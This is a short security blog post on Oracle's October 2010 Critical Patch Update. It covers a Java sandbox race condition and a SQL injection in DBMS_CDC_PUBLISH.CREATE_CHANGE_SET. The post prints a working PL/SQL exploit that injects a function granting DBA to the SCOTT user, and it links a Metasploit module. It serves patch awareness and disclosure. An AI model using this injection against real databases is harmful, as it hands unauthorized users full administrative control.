Oracle CPU:October 2010

There are some very interesting issues fixed by Oracle in this month's Critical Patch Update (CPU). Although, the details about the exact vulnerabilities are still not public. The ones which i found really interesting are:

1. ZDI-10-201: Oracle Database Java Stored Procedure Race Condition Remote Code Execution Vulnerability

" This vulnerability allows remote attackers to break out of the Java Sandbox implemented by Oracle's relational database. Authentication is required in that a user must be able to create a Java stored procedure
to trigger the issue. ".. CVSS score 9

2. SQL Injection in DBMS_CDC_PUBLISH.CREATE_CHANGE_SET reported by Esteben, which could allow any user with EXECUTE_CATALOG_ROLE to become DBA.

the exploit is fairly simple:
--------------------
as SCOTT User:

create or replace function pwn return varchar2 authid current_user is
PRAGMA autonomous_transaction;
BEGIN
execute immediate 'grant dba to scott';
commit;
return 'z';
END;
--
grant execute on SCOTT.pwn to public
--

begin
sys.dbms_cdc_publish.create_change_set('a','a','a''||SCOTT.pwn()||''a','Y',sysdate,
sysdate);
end;
------------------
The exploit is already available in metasploit: https://www.metasploit.com/redmine/projects/framework/repository/revisions/10691/entry/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb. Thanks to MC

This affects 10gR1, 10gR2, 11g R1 and 11gR2. I agree with Appsec Inc that the CVSS score should be 7.5 and not 4.9 which oracle has assigned to it.